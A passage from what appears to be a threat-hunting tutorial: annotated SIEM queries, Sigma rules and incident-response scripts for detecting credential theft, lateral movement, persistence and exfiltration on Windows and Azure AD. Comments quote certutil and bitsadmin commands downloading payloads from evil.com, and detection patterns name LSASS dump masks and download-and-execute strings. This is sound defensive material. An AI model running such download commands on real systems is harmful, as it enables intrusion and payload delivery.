Intermediate

index=wineventlog EventCode=4624
  LogonType=3
  AuthenticationPackageName=NTLM
| eval is_ntlmv2=if(LmPackageName="NTLM V2","yes","no")
  # => LmPackageName tells us the specific NTLM dialect used
  # => NTLMv2 from a workstation is unexpected for domain auth
| where is_ntlmv2="yes"
  # => filter to NTLMv2-only events; Kerberos would not appear here
| lookup asset_inventory ip as IpAddress OUTPUT asset_type
  # => enrich source IP against known asset types (server/workstation/DC)
| where asset_type="workstation"
  # => DCs and servers may legitimately use NTLM; workstations should not relay
| stats count by src_ip, TargetUserName, WorkstationName, _time
  # => count per source-to-target pair to spot repeated auth attempts
  # => high count from one src_ip to many targets = PtH spray
| where count > 3
  # => threshold of 3 filters noise while catching meaningful patterns
| sort - count
  # => highest counts first for analyst triage priority

index=wineventlog EventCode=4769
  TicketOptions=0x40810000
  TicketEncryptionType=0x17
  # => EncType 0x17 = RC4-HMAC; legitimate clients request AES (0x11 or 0x12)
  Status=0x0
  # => Status 0x0 = success; failed requests are noise for this hunt
| where NOT match(ServiceName, "^krbtgt")
  # => exclude krbtgt TGS (normal AS-REP traffic); we want SPN tickets
  # => krbtgt requests indicate golden/silver ticket activity — separate hunt
| stats count as tgs_count, dc(ServiceName) as unique_spns
    by AccountName, IpAddress, _time span=5m
  # => bucket into 5-minute windows to catch burst patterns
  # => dc(ServiceName) counts distinct SPNs requested in each window
| where unique_spns > 5
  # => >5 distinct SPNs in 5 min is unusual for a human; service accounts are excluded by etype filter
  # => automated tooling (Rubeus, Invoke-Kerberoast) requests many SPNs quickly
| sort - unique_spns

index=wineventlog EventCode=4768
  PreAuthType=0
  # => PreAuthType 0 = no pre-authentication supplied by client
  # => legitimate Kerberos always sends pre-auth (usually type 2 = encrypted timestamp)
| where TicketEncryptionType=0x17
  # => RC4 (0x17) indicates the client requested a crackable ticket
  # => AES (0x11/0x12) AS-REPs are harder to crack; RC4 is the attack preference
| lookup disabled_preauth_accounts SamAccountName as AccountName OUTPUT confirmed
  # => cross-reference against known DONT_REQUIRE_PREAUTH accounts in AD
  # => accounts not in this list warrant immediate escalation
| stats count by AccountName, IpAddress, confirmed, _time
  # => group by account+IP to see if one IP targets many accounts
| eval risk=if(confirmed="no","HIGH","MEDIUM")
  # => unknown accounts with this pattern = HIGH risk
  # => known DONT_REQUIRE_PREAUTH accounts = MEDIUM (still verify the source)
| sort - risk, count

index=wineventlog EventCode=4662
  ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
  # => GUID for domain object class; DCSync operates on the root domain object
| where match(Properties, "(?i)1131f6aa-9c07-11d1-f79f-00c04fc2dcd2|1131f6ab")
  # => 1131f6aa = DS-Replication-Get-Changes (DRSUAPI Guid)
  # => 1131f6ab = DS-Replication-Get-Changes-All (pulls all secrets including krbtgt)
| lookup dc_inventory ip as SubjectIpAddress OUTPUT is_dc
  # => look up whether the source IP is a known domain controller
| where NOT is_dc="true"
  # => DCs calling these APIs is normal replication; non-DCs calling them = DCSync
  # => any hit here should be treated as confirmed compromise until proven otherwise
| table _time, SubjectUserName, SubjectIpAddress, ComputerName, Properties
  # => surface who, from where, against which machine

index=wineventlog EventCode=1644
  # => Event 1644 = "An expensive, inefficient, or long-running search" on the DC
  # => must enable LDAP query logging: Set-ItemProperty -Path "HKLM:\SYSTEM\..." -Name 15 -Value 5
| rex field=Message "Client:\s+(?<client_ip>[^\s]+)"
  # => extract the client IP from the LDAP query log message
| rex field=Message "Result Entries:\s+(?<result_count>\d+)"
  # => extract how many objects the query returned
| eval result_count=tonumber(result_count)
| where result_count > 200
  # => SharpHound routinely pulls full-domain object lists; 200+ results per query is abnormal
| lookup asset_inventory ip as client_ip OUTPUT asset_type
| where asset_type="workstation"
  # => management tools on servers may legitimately run large LDAP queries
  # => workstations almost never need bulk AD enumeration
| stats count as query_count, sum(result_count) as total_results
    by client_ip, _time span=60s
  # => bucket into 60-second windows
| where query_count > 10
  # => >10 large LDAP queries per minute is the BloodHound burst signature
| sort - total_results

index=wineventlog EventCode=7045
  ServiceFileName="*\\PSEXESVC*" OR ServiceName="PSEXESVC"
  # => PSEXESVC is the canonical PsExec service name; also check custom-named variants
  # => attackers sometimes rename the service (e.g., svc_abc) — widen with path heuristics
| eval target_host=Computer, service_time=_time
  # => capture target hostname and creation timestamp for join
| join target_host type=inner
    [search index=wineventlog EventCode=4624 LogonType=3
     | eval target_host=Computer, logon_time=_time]
  # => inner join on the same target host
  # => LogonType 3 = network logon (PsExec authenticates over the network)
| where abs(logon_time - service_time) < 30
  # => require both events within 30 seconds of each other
  # => tight window reduces false positives from unrelated logons
| table _time, target_host, src_ip, AccountName, ServiceName, ServiceFileName
  # => surface the timeline, target, source IP, and installing account

index=wineventlog EventCode=4688
  ParentProcessName="*wmiprvse.exe"
  # => wmiprvse.exe is the WMI Provider Host; it should spawn provider DLLs, not shells
  # => ParentProcessName requires process creation audit with command-line enabled
| where match(NewProcessName, "(?i)cmd\.exe|powershell\.exe|wscript\.exe|cscript\.exe")
  # => these interpreters launched by WMI = remote command execution
  # => wscript/cscript indicate script-based WMI payloads
| eval suspicious_cmdline=if(match(CommandLine, "(?i)-enc|-nop|bypass|IEX|downloadstring"), "yes","no")
  # => -enc / -nop / bypass = encoded/unrestricted PowerShell
  # => IEX / downloadstring = in-memory download-and-execute pattern
| stats count by Computer, SubjectUserName, NewProcessName, CommandLine, suspicious_cmdline
  # => aggregate by host and user to see scope of lateral movement
| sort - suspicious_cmdline, count
  # => prioritize encoded/obfuscated commands; count shows spread

index=wineventlog EventCode=4688
| where match(NewProcessName, "(?i)certutil\.exe|bitsadmin\.exe")
  # => certutil and bitsadmin are both signed Windows binaries — never blocked by AV
| where match(CommandLine, "(?i)http[s]?://")
  # => any HTTP/HTTPS argument is suspicious for these tools
  # => certutil: certutil -urlcache -split -f https://evil.com/payload.exe
  # => bitsadmin: bitsadmin /transfer job /download /priority fg https://evil.com/payload.exe
| rex field=CommandLine "(?i)(https?://[^\s\"']+)" as downloaded_url
  # => extract the specific URL for threat intelligence enrichment
| lookup threat_intel_urls url as downloaded_url OUTPUT malicious, category
  # => check URL against TI feed (e.g., MISP, OTX, URLhaus)
| eval risk=case(
    malicious="yes","CRITICAL",          # => known-bad URL = immediate escalation
    match(downloaded_url,"(?i)\.(exe|dll|ps1|bat|vbs)"),"HIGH",  # => executable extension
    true(),"MEDIUM")                     # => unknown URL + LOLBin = still investigate
| table _time, Computer, SubjectUserName, NewProcessName, CommandLine, downloaded_url, risk
| sort - risk

index=sysmon EventCode=10
  TargetImage="*\\lsass.exe"
  # => any process accessing lsass is potentially dumping credentials
| where match(GrantedAccess, "0x1010|0x1410|0x143a|0x1fffff|0x40|0x1000")
  # => 0x1010 = PROCESS_VM_READ + PROCESS_QUERY_INFO (Mimikatz typical)
  # => 0x143a = full access for full-dump (ProcDump, Task Manager)
  # => 0x1fffff = PROCESS_ALL_ACCESS (very suspicious)
| lookup known_lsass_readers process as SourceImage OUTPUT legitimate
  # => allowlist: lsass.exe itself, svchost.exe, antivirus engines, EDR agents
  # => any process not in this list should be investigated
| where NOT legitimate="yes"
  # => filter known legitimate readers to reduce alert fatigue
| eval dump_method=case(
    match(SourceImage,"(?i)procdump"),"ProcDump",         # => signed Sysinternals tool
    match(SourceImage,"(?i)rundll32|comsvcs"),"Comsvcs",  # => comsvcs.dll MiniDump technique
    match(SourceImage,"(?i)werfault"),"WerFault abuse",   # => silent dump via crash reporting
    true(),"Unknown/Custom")
  # => categorize the likely technique for triage context
| table _time, Computer, SourceImage, SourceProcessId, GrantedAccess, dump_method

index=sysmon EventCode=13
| where match(TargetObject,
    "(?i)\\CurrentVersion\\Run|\\CurrentVersion\\RunOnce|\\CurrentVersion\\RunServices")
  # => Run = execute at logon; RunOnce = execute once at next logon then delete
  # => RunServices = deprecated but still abused on older systems
| where NOT match(Details, "(?i)OneDrive|Teams|Slack|Zoom|Dropbox|Spotify")
  # => allowlist common legitimate autorun applications to reduce noise
  # => this list should be tuned to your environment's standard software
| eval suspicious_value=case(
    match(Details, "(?i)\.vbs|\.js|\.hta|\.wsf"), "Script extension",
    # => scripts in Run keys are unusual; legit software uses .exe
    match(Details, "(?i)%temp%|%appdata%|\\Users\\.*\\AppData"), "Temp/AppData path",
    # => malware often persists from user-writable temp locations
    match(Details, "(?i)powershell|cmd\.exe|wscript|mshta|regsvr32"), "LOLBin",
    # => Run keys invoking interpreters indicate fileless persistence
    true(), "Review")
| stats count by Computer, Image, TargetObject, Details, suspicious_value
  # => Image = the process that wrote the key; suspicious if not an installer
| where NOT suspicious_value="Review" OR count > 3
  # => surface definite hits + repeated writes of borderline entries
| sort - suspicious_value

index=wineventlog EventCode=4698
  # => Event 4698 = A scheduled task was created
| rex field=Message "Task Name:\s+(?<task_name>[^\r\n]+)" maxmatch=1
  # => extract the task name from the message body
| rex field=Message "<Command>(?<task_command>[^<]+)</Command>" maxmatch=1
  # => extract the command element from the embedded XML
| rex field=Message "<Arguments>(?<task_args>[^<]+)</Arguments>" maxmatch=1
  # => extract arguments (may contain encoded PowerShell or URLs)
| eval encoded=if(match(task_args, "(?i)-enc|-EncodedCommand|[A-Za-z0-9+/]{50,}=*"), "yes","no")
  # => base64 length heuristic: >50 contiguous base64 chars in args = encoded payload
| eval masquerade=if(match(task_name, "(?i)Microsoft|Windows|Update|Defender|Edge"), "yes","no")
  # => attackers often name tasks after legitimate Windows components to blend in
| where encoded="yes" OR match(task_command, "(?i)powershell|cmd|wscript|mshta|regsvr32")
  # => focus on tasks running interpreters or encoded payloads
| table _time, Computer, SubjectUserName, task_name, task_command, task_args, encoded, masquerade
| sort - encoded, masquerade
  # => encoded + masquerade combination = highest priority

index=sysmon EventCode=20 OR EventCode=21
  # => Sysmon Event 20 = WmiEventFilter activity detected
  # => Sysmon Event 21 = WmiEventConsumer activity detected
| eval component=case(EventCode=20, "Filter", EventCode=21, "Consumer", true(), "Unknown")
  # => filters define what event triggers the subscription
  # => consumers define what action executes when the filter fires
| rex field=Message "Name:\s+(?<wmi_name>[^\r\n]+)"
  # => extract the filter or consumer name; malware uses generic-sounding names
| eval suspicious_name=if(
    match(wmi_name, "(?i)update|system|windows|service|microsoft"), "masquerade","custom")
  # => masquerade names blend with legitimate WMI objects
| join wmi_name type=left
    [search index=sysmon EventCode=22
     | rex field=Message "Consumer:\s+(?<wmi_name>[^\r\n]+)"
     | rex field=Message "Filter:\s+(?<filter_ref>[^\r\n]+)"]
  # => Event 22 = WmiEventConsumerToFilter binding — the activation link
  # => joining filter + consumer + binding shows the complete persistence mechanism
| where component="Consumer"
  # => the consumer (executor) is the critical artifact — surface all consumers
| rex field=Message "(?i)command[^:]*:\s+(?<payload>[^\r\n]+)"
  # => extract the command the consumer will execute
| table _time, Computer, wmi_name, payload, suspicious_name, filter_ref

index=web_logs
| eval is_upload=if(method="POST" AND match(uri_path, "(?i)/uploads/.*\.(php|aspx|jsp|jspx|phtml)") AND status=200, "yes","no")
  # => POST to writable upload directory with script extension + 200 = successful upload
  # => 403/500 responses indicate blocked or failed upload attempts
| eval is_activation=if(match(uri_path, "(?i)/uploads/.*\.(php|aspx|jsp)") AND method="GET" AND match(uri_query, "(?i)cmd|exec|shell|passwd|id=|run="), "yes","no")
  # => GET to uploaded script with shell-command parameters = web shell execution
  # => common parameter names vary by web shell family (c99, b374k, China Chopper)
| stats values(method) as methods, values(status) as statuses,
         max(is_upload) as had_upload, max(is_activation) as had_activation
         by src_ip, uri_path, _time span=10m
  # => correlate upload and activation events from same IP within 10 minutes
| where had_upload="yes" AND had_activation="yes"
  # => require BOTH events to reduce false positives from legitimate file uploads
  # => single-event hits still worth reviewing but lower priority
| lookup geoip src_ip OUTPUT country_name
  # => enrich source IP with geolocation for analyst context
| table _time, src_ip, country_name, uri_path, methods, statuses

index=network_flows dest_port IN (80,443,8080,8443,4444,1234)
  direction="outbound"
| eval hour_of_day=strftime(_time, "%H")
  # => used later to check if beaconing spans sleep hours (unusual for humans)
| bucket _time span=1s
  # => reduce sub-second duplicate flows from session state reporting
| streamstats window=100 current=f by src_ip, dest_ip
    global=false earliest(_time) as prev_time
  # => track the timestamp of the previous connection in the same src→dest stream
| eval interval=_time - prev_time
  # => time gap between consecutive connections to the same destination
| stats avg(interval) as avg_interval, stdev(interval) as stddev_interval,
         count as connection_count
         by src_ip, dest_ip, dest_port
  # => aggregate statistics across the full observation window
| where connection_count > 10
  # => need enough data points for meaningful statistics
| eval cv=stddev_interval / avg_interval
  # => coefficient of variation: low CV = highly regular timing = beacon
  # => CV < 0.3 is characteristic of automated beaconing
| where cv < 0.3 AND avg_interval BETWEEN 30 AND 3600
  # => 30s–1h average intervals cover most common beacon frequencies
  # => very short (<30s) or very long (>1h) intervals still worth hunting separately
| lookup threat_intel_ips ip as dest_ip OUTPUT malicious
| sort cv
  # => lowest CV first = most clock-like = highest confidence beacon

index=dns_logs query_type="A" OR query_type="TXT" OR query_type="CNAME"
| rex field=query "^(?<subdomain>[^.]+)\.(?<domain>[^.]+\.[^.]+)$"
  # => extract the leftmost label (subdomain) and the registered domain
  # => DNS tunneling data lives in the subdomain portion
| eval subdomain_len=len(subdomain)
  # => long subdomains encode data: base64 or hex of the payload chunk
| eval entropy=0
  # => entropy calculation approximation via character diversity
| eval char_ratio=round((len(replace(lower(subdomain),"[^a-z]","")) / subdomain_len),2)
  # => ratio of alpha chars; hex-encoded data is 50% non-alpha (digits)
  # => base64-encoded data has ~75% alpha; human domain labels are ~95%+ alpha
| where subdomain_len > 40 OR char_ratio < 0.7
  # => subdomain >40 chars OR low alpha ratio = likely encoded data
| stats count as query_count, dc(query) as unique_queries, avg(subdomain_len) as avg_len
    by src_ip, domain, _time span=1h
  # => aggregate per source host per registered domain per hour
| where query_count > 100 OR unique_queries > 50
  # => volume threshold: legitimate domains rarely generate this many unique subdomains
  # => 100 queries/hr to one domain = automated tool, not human browsing
| lookup threat_intel_domains domain OUTPUT malicious, category
| sort - unique_queries

index=network_flows direction="outbound"
  dest_port IN (443,80,21,22,445,8443)
| stats sum(bytes_out) as total_bytes_out by src_ip, dest_ip, dest_port, _time span=1h
  # => sum outbound bytes per flow tuple per hour
| eval gb_out=round(total_bytes_out/1073741824, 2)
  # => convert bytes to GB for human-readable triage
| where gb_out > 0.5
  # => 500 MB/hr threshold; tune based on environment's normal transfer patterns
| lookup historical_connections ip as dest_ip OUTPUT first_seen_date
  # => enrichment: when was this destination IP first seen in your environment?
| eval is_new_dest=if(isnull(first_seen_date) OR relative_time(now(),"-30d") > strptime(first_seen_date,"%Y-%m-%d"), "yes","no")
  # => "new" = not seen in the last 30 days; new destinations are higher risk
| lookup geoip dest_ip OUTPUT country_name, asn_org
  # => geolocation and ASN help identify unexpected destination countries
  # => flag transfers to hosting ASNs (OVH, Hetzner, Vultr) — common attacker infrastructure
| lookup cloud_ip_ranges ip as dest_ip OUTPUT cloud_provider
  # => exclude known cloud services (AWS, Azure, GCP, Cloudflare) to reduce noise
| where isnull(cloud_provider) AND is_new_dest="yes"
  # => focus on non-cloud new destinations; most cloud uploads are legitimate
| sort - gb_out
  # => largest transfers first for triage priority

index=wineventlog EventCode=4688 earliest=-30d
  # => 30-day historical window gives a statistically meaningful baseline
| eval parent=lower(mvindex(split(ParentProcessName,"\\"),-1))
  # => extract just the binary name from the full parent path (case-normalized)
| eval child=lower(mvindex(split(NewProcessName,"\\"),-1))
  # => extract just the binary name from the full child path
| where parent != child
  # => exclude self-spawning (normal for some processes like svchost)
| stats count by parent, child
  # => count occurrences of each unique parent→child relationship
  # => common pairs: svchost→cmd (~10,000), explorer→chrome (~50,000)
  # => rare pairs: winword→powershell (2-3), msiexec→regsvr32 (1)
| where count < 5
  # => "rare" threshold: any pair seen fewer than 5 times in 30 days
  # => adjust based on environment size (larger orgs need higher threshold)
| eval attacker_relevant=case(
    match(child,"(?i)powershell|cmd|wscript|mshta|regsvr32|certutil"),"Interpreter/LOLBin",
    match(parent,"(?i)winword|excel|outlook|powerpnt"),"Office macro spawn",
    match(parent,"(?i)browser|chrome|firefox|iexplore"),"Browser spawn",
    true(),"Other rare")
  # => categorize pairs by attacker technique relevance
| sort - attacker_relevant, count
  # => attacker-relevant rare pairs = top priority for follow-up investigation

index: "web-proxy-*"
fields: @timestamp, src_ip, dest_url, http.request.user_agent, http.response.status_code
filter:
  - range:
      @timestamp:
        gte: "now-60d"
        # => 60-day window provides a statistically robust frequency baseline
  - exists:
      field: http.request.user_agent
      # => exclude events with no User-Agent header (some automated tools omit it)
aggregations:
  user_agent_count:
    terms:
      field: http.request.user_agent.keyword
      size: 10000
      # => retrieve the 10,000 most common User-Agents for frequency analysis
      order:
        _count: asc
        # => ascending order puts the rarest agents first
    aggs:
      sample_ips:
        terms:
          field: src_ip
          size: 5
          # => show up to 5 source IPs using each rare agent
      sample_urls:
        terms:
          field: dest_url
          size: 5
          # => show destination URLs accessed with this agent
post_filter:
  # => in follow-up query, filter to agents with count < 50 AND not matching known browsers
  # => known browser pattern: Mozilla, Chrome, Safari, Firefox, Edge, curl, python-requests
  # => attacker examples: "Mozilla/4.0 (compatible)", "Go-http-client/1.1", "Cobalt Strike"

# Detection Hypothesis — MITRE ATT&CK T1003.001: LSASS Memory Dumping
# -----------------------------------------------------------------------
hypothesis:
  technique: "T1003.001 - OS Credential Dumping: LSASS Memory"
  # => MITRE ATT&CK technique ID and sub-technique for tracking and coverage mapping
 
  attacker_goal: >
    Attacker reads lsass.exe memory to extract plaintext passwords,
    NTLM hashes, or Kerberos tickets for lateral movement or privilege escalation.
    # => defining the goal ensures the detection targets the right behavioral step
 
  assumption: >
    Attacker has SYSTEM or SeDebugPrivilege on the target host.
    # => precondition — detection may miss cases where these privileges are obtained differently
 
data_sources:
  primary:
    - "Sysmon Event ID 10 (ProcessAccess on lsass.exe)"
    # => most reliable: records process handle open with specific access rights
  secondary:
    - "Windows Event ID 4656 (object access)"
    - "EDR telemetry (process memory read alerts)"
    - "Windows Event ID 4688 + 4689 (process creation/termination of dump tools)"
    # => secondary sources provide corroboration and catch technique variants
 
observables:
  high_confidence:
    - "SourceImage NOT IN known-good allowlist AND GrantedAccess IN [0x1010,0x1410,0x143a,0x1fffff]"
    # => specific access right masks that include PROCESS_VM_READ
  medium_confidence:
    - "procdump.exe -ma lsass.exe OR comsvcs.dll MiniDump in CommandLine"
    # => named tool signatures; attackers rename tools to evade these
  low_confidence:
    - "Any process open on lsass.exe not from SYSTEM"
    # => catches novel techniques but high false-positive rate from AV/EDR
 
false_positive_profile:
  - "EDR agents (CrowdStrike, SentinelOne, Carbon Black) — allowlist by path + signature"
  - "Windows Error Reporting (WerFault.exe) — allowlist specific access mask"
  - "Antivirus scanners — allowlist by signer certificate"
  # => documenting expected false positives reduces analyst fatigue and supports tuning
 
success_criteria:
  - "Alert fires within 60 seconds of lsass dump on test host"
  - "False positive rate < 2 per day in production"
  # => measurable outcomes allow evaluation after deployment

# File: rules/windows/credential_access/lsass_memory_dump_sysmon.yml
title: LSASS Memory Access by Suspicious Process
# => human-readable title for analyst consumption and documentation
 
id: 7b9e2f4a-3d1c-4e8b-a562-f0d1e3c4b789
# => UUID v4 unique identifier; never reuse across rules; used for deduplication in SIEM
 
status: experimental
# => lifecycle: test -> experimental -> stable; experimental means under active tuning
 
description: |
  Detects suspicious process access to lsass.exe with memory-read access rights,
  indicating potential credential dumping via tools such as Mimikatz, ProcDump,
  or comsvcs.dll MiniDump technique.
  # => description feeds SOAR playbooks and analyst guidance dashboards
 
references:
  - https://attack.mitre.org/techniques/T1003/001/
  - https://github.com/gentilkiwi/mimikatz
  # => traceability to ATT&CK and tool documentation
 
author: "SOC Detection Engineering Team"
date: 2026/05/21
modified: 2026/05/21
tags:
  - attack.credential_access # => MITRE tactic
  - attack.t1003.001 # => MITRE technique
  - attack.s0002 # => MITRE software reference for Mimikatz
 
logsource:
  category: process_access # => Sigma category that maps to Sysmon Event ID 10
  product: windows
  # => Sigma's sigmac/pySigma resolves this to the correct field names per backend
 
detection:
  selection_target:
    TargetImage|endswith: '\lsass.exe'
    # => match only accesses to lsass.exe as the target
  selection_access:
    GrantedAccess|contains:
      - "0x1010" # => PROCESS_VM_READ + PROCESS_QUERY_INFO (Mimikatz classic)
      - "0x1410" # => extended read access
      - "0x143a" # => near-full access (ProcDump full dump)
      - "0x1fffff" # => PROCESS_ALL_ACCESS (very aggressive; rare legit)
      - "0x40" # => PROCESS_DUP_HANDLE used in some evasion techniques
  filter_legitimate:
    SourceImage|startswith:
      - 'C:\Program Files\CrowdStrike\' # => EDR agent
      - 'C:\Program Files\SentinelOne\' # => EDR agent
      - 'C:\Windows\System32\werfault.exe' # => Windows Error Reporting
  condition: (selection_target AND selection_access) AND NOT filter_legitimate
  # => require both target and access conditions; exclude known-good sources
 
falsepositives:
  - AV/EDR agents not in the filter list — add to filter_legitimate
  - Windows Defender Credential Guard inspection processes
 
level: high
# => severity: informational/low/medium/high/critical; high triggers immediate triage

title: Encoded PowerShell Command Execution
id: a3c7e912-4f5b-4d2a-b891-e0f3c2d1a4b6
status: stable
# => stable = well-tuned with documented false positive profile
 
description: |
  Detects PowerShell processes launched with the -EncodedCommand parameter,
  which is used to execute base64-encoded payloads and is a common technique
  to obfuscate malicious scripts from log inspection.
 
author: "SOC Detection Engineering Team"
date: 2026/05/21
tags:
  - attack.execution # => MITRE tactic: Execution
  - attack.defense_evasion # => MITRE tactic: Defense Evasion
  - attack.t1059.001 # => PowerShell technique
  - attack.t1027 # => Obfuscated Files or Information
 
logsource:
  category: process_creation # => Sysmon Event ID 1 OR Windows Event 4688 with command-line
  product: windows
 
detection:
  selection_encoded:
    CommandLine|contains:
      - " -EncodedCommand " # => full flag name with surrounding spaces
      - " -enc " # => abbreviated flag (most common in attacker tooling)
      - " -EC " # => uppercase variant
      # => PowerShell parameter parsing is case-insensitive; all variants are valid
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe' # => PowerShell 7 binary name
  filter_admin_tools:
    ParentImage|startswith:
      - 'C:\Program Files\ManageEngine\' # => RMM/admin tool with known encoded PS usage
      - 'C:\Program Files\SCCM\' # => SCCM client management
  filter_short_encoded:
    CommandLine|re: "(?i)-e[nc]+ [A-Za-z0-9+/]{0,20}={0,2}$"
    # => very short base64 strings (<20 chars) are often legitimate version checks
    # => long encoded commands are always suspicious
 
  condition: selection_encoded AND NOT (filter_admin_tools OR filter_short_encoded)
  # => detection fires when encoded PS is used outside known admin tools and not trivially short
 
falsepositives:
  - Legitimate RMM/management tools using encoded commands for configuration
  - SCCM/Intune deployment scripts — add parent process to filter_admin_tools
  - Scheduled tasks running encoded PS for maintenance — review and allowlist by task name
 
level: medium
# => medium because encoded PS has many legitimate uses; context (parent, path, payload) elevates

// Impossible Travel Detection — Azure AD Sign-In Logs
// -------------------------------------------------------
SigninLogs
| where TimeGenerated > ago(24h)
  // look back 24 hours; adjust to 7d for lower-frequency accounts
| where ResultType == 0
  // ResultType 0 = successful authentication; failed logins are not impossible travel
| project TimeGenerated, UserPrincipalName, IPAddress, Location, CountryOrRegion
  // project only needed fields to reduce query cost
| sort by UserPrincipalName asc, TimeGenerated asc
  // sort by user then time to prepare for lag calculation
| serialize
  // required before using prev() function in streaming window calculations
| extend prev_time = prev(TimeGenerated, 1)
  // capture timestamp of the immediately preceding sign-in for this user
| extend prev_country = prev(CountryOrRegion, 1)
  // capture country of the preceding sign-in
| extend prev_user = prev(UserPrincipalName, 1)
| where UserPrincipalName == prev_user
  // only compare events for the same user account
| extend hours_between = datetime_diff('hour', TimeGenerated, prev_time)
  // hours elapsed between the two authentications
| where hours_between between (0 .. 4)
  // 4-hour window: most impossible travel occurs within this window
  // wider windows increase false positives from VPN users
| where CountryOrRegion != prev_country
  // different countries is the base condition
| where isnotempty(CountryOrRegion) and isnotempty(prev_country)
  // exclude events where geolocation data is missing
| where CountryOrRegion !in ("Unknown") and prev_country !in ("Unknown")
| project TimeGenerated, UserPrincipalName, IPAddress,
          CurrentCountry = CountryOrRegion, PreviousCountry = prev_country,
          hours_between
  // surface actionable columns for analyst triage
| where not (CurrentCountry == "United States" and prev_country == "Canada")
  // example allowlist: US/Canada is plausible for border workers; tune per environment
| order by hours_between asc
  // shortest time gaps first = most implausible travel = highest priority

// New Privileged Role Assignment Detection — Azure AD Audit Logs
// ---------------------------------------------------------------
AuditLogs
| where TimeGenerated > ago(1h)
  // 1-hour lookback for near-real-time alerting; schedule rule to run every 15 min
| where OperationName == "Add member to role"
  // specific operation for role membership addition
| where Result == "success"
  // only alert on successful assignments; failed attempts are tracked separately
| extend TargetRole = tostring(TargetResources[0].displayName)
  // extract the role name from the nested TargetResources array
| extend TargetUser = tostring(TargetResources[0].userPrincipalName)
  // the account that was granted the role
| extend InitiatedBy_UPN = tostring(InitiatedBy.user.userPrincipalName)
  // who performed the assignment — should be a known identity management account
| extend InitiatedBy_App = tostring(InitiatedBy.app.displayName)
  // if initiated by an app/service principal, capture that name
| where TargetRole in (
    "Global Administrator",
    "User Administrator",
    "Security Administrator",
    "Privileged Role Administrator",
    "Exchange Administrator"
    // => add all high-privilege roles relevant to your M365 environment
  )
| where isempty(InitiatedBy_App)
  // flag human-initiated assignments; service principals running provisioning workflows are expected
  // remove this line if your environment has no automated provisioning
| where InitiatedBy_UPN !in ("provisioning-svc@contoso.com", "idm-admin@contoso.com")
  // allowlist known authorized identity management accounts
  // => tune to your environment's provisioning account UPNs
| project TimeGenerated, TargetRole, TargetUser, InitiatedBy_UPN,
          InitiatedBy_App, CorrelationId
  // CorrelationId links to the full authentication context in SigninLogs
| order by TimeGenerated desc

# ============================================================
# LINUX HOST ISOLATION — iptables-based containment
# Run as root on the compromised host or via remote management
# ============================================================
 
# Step 1: Flush all existing rules (start clean)
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
# => removes any existing rules that might conflict with isolation rules
# => CAUTION: this temporarily drops all firewall protection during the transition
 
# Step 2: Allow established/related connections to prevent session drops
iptables -A INPUT  -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# => prevents dropping the current SSH session we're using for containment
 
# Step 3: Allow SSH from IR jump box ONLY
iptables -A INPUT  -s 10.10.10.5 -p tcp --dport 22 -j ACCEPT
# => 10.10.10.5 = IR jump box; substitute your actual IR management IP
iptables -A OUTPUT -d 10.10.10.5 -p tcp --sport 22 -j ACCEPT
 
# Step 4: Allow DNS to internal resolver (needed for some investigation tools)
iptables -A OUTPUT -d 10.10.0.53 -p udp --dport 53 -j ACCEPT
# => substitute your internal DNS resolver IP
 
# Step 5: Block ALL other inbound and outbound traffic
iptables -P INPUT  DROP
# => default policy: drop everything not explicitly allowed
iptables -P OUTPUT DROP
# => this cuts off the attacker's reverse shell and C2 callback
iptables -P FORWARD DROP
 
# Step 6: Save rules so they survive a service restart (not reboot)
iptables-save > /etc/iptables/rules.v4
# => persists rules; on Ubuntu use: netfilter-persistent save
 
# Verification: confirm C2 destination is now blocked
iptables -L -n -v | grep "185.220.101.42"
# => should show no ACCEPT rule for the attacker IP
# => test with: curl --connect-timeout 5 http://185.220.101.42:4444 — should time out

# ============================================================
# WINDOWS ERADICATION CHECKLIST
# Run in PowerShell as Administrator on the compromised host
# Document every finding and removal action in the IR report
# ============================================================
 
# 1. Enumerate and audit scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -ne "Disabled"} |
  Select-Object TaskName, TaskPath, @{n='Command';e={$_.Actions.Execute}} |
  Export-Csv C:\IR\scheduled_tasks.csv
# => exports all enabled tasks; review for unknown task names or suspicious commands
# => remove confirmed malicious task: Unregister-ScheduledTask -TaskName "MaliciousTask" -Confirm:$false
 
# 2. Enumerate registry Run keys
$runkeys = @(
  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
  "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)
foreach ($key in $runkeys) {
  Write-Output "=== $key ==="; Get-ItemProperty $key
  # => lists all values; identify and remove attacker entries
}
# => remove entry: Remove-ItemProperty -Path "HKCU:\...\Run" -Name "MaliciousEntry"
 
# 3. Enumerate WMI event subscriptions
Get-WMIObject -Namespace root\subscription -Class __EventFilter | Select-Object Name, Query
# => lists all WMI event filters; legitimate filters are few and well-known
Get-WMIObject -Namespace root\subscription -Class __EventConsumer | Select-Object Name
# => lists all consumers; attacker-created consumers have unusual names
# => remove: Get-WMIObject -Namespace root\subscription -Class __EventFilter -Filter "Name='BVUpdater'" | Remove-WMIObject
 
# 4. Enumerate installed services
Get-Service | Where-Object {$_.StartType -ne "Disabled"} |
  Select-Object Name, DisplayName, StartType, BinaryPathName |
  Sort-Object StartType
# => look for services with executables in non-standard paths (Temp, AppData, Users)
# => remove: sc.exe delete "MaliciousService"
 
# 5. Remove attacker-created user accounts
Get-LocalUser | Where-Object {$_.Enabled -eq $true} | Select-Object Name, LastLogon
# => compare against approved user list; remove unknown accounts
# => Remove-LocalUser -Name "backdoor_user"
 
# 6. Reset compromised account passwords
# => All accounts that logged into this host during the intrusion period should be reset
# => Get-EventLog -LogName Security -InstanceId 4624 -After (Get-Date).AddDays(-30) |
#    Where-Object {$_.Message -match "LogonType:\s+3"} | Select-Object Message

# ============================================================
# MEMORY FORENSICS TRIAGE — volatility3
# Prerequisite: pip install volatility3
# Memory image: /evidence/host01_20260521.raw
# ============================================================
 
# Step 1: Identify the OS profile (volatility3 autodetects)
python3 vol.py -f /evidence/host01_20260521.raw windows.info
# => outputs Windows version, kernel version, and architecture
# => confirms the correct symbol table will be used for parsing
 
# Step 2: Process tree — find orphan/injected processes
